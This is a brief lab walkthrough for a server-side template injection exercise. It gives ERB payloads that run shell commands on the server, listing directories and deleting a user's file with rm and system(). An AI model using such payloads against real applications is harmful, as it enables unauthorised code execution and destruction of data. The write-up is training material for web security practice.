Lab: Basic server-side template injection
Steps
<%= `ls /` %>
<%= `ls /home/carlos` %>
<%= `rm /home/carlos/morale.txt` %>
OR
<%= system("rm /home/carlos/morale.txt") %>PreviousSSTI : Server Side Template InjectionNextLab: Basic server-side template injection (code context)
Last updated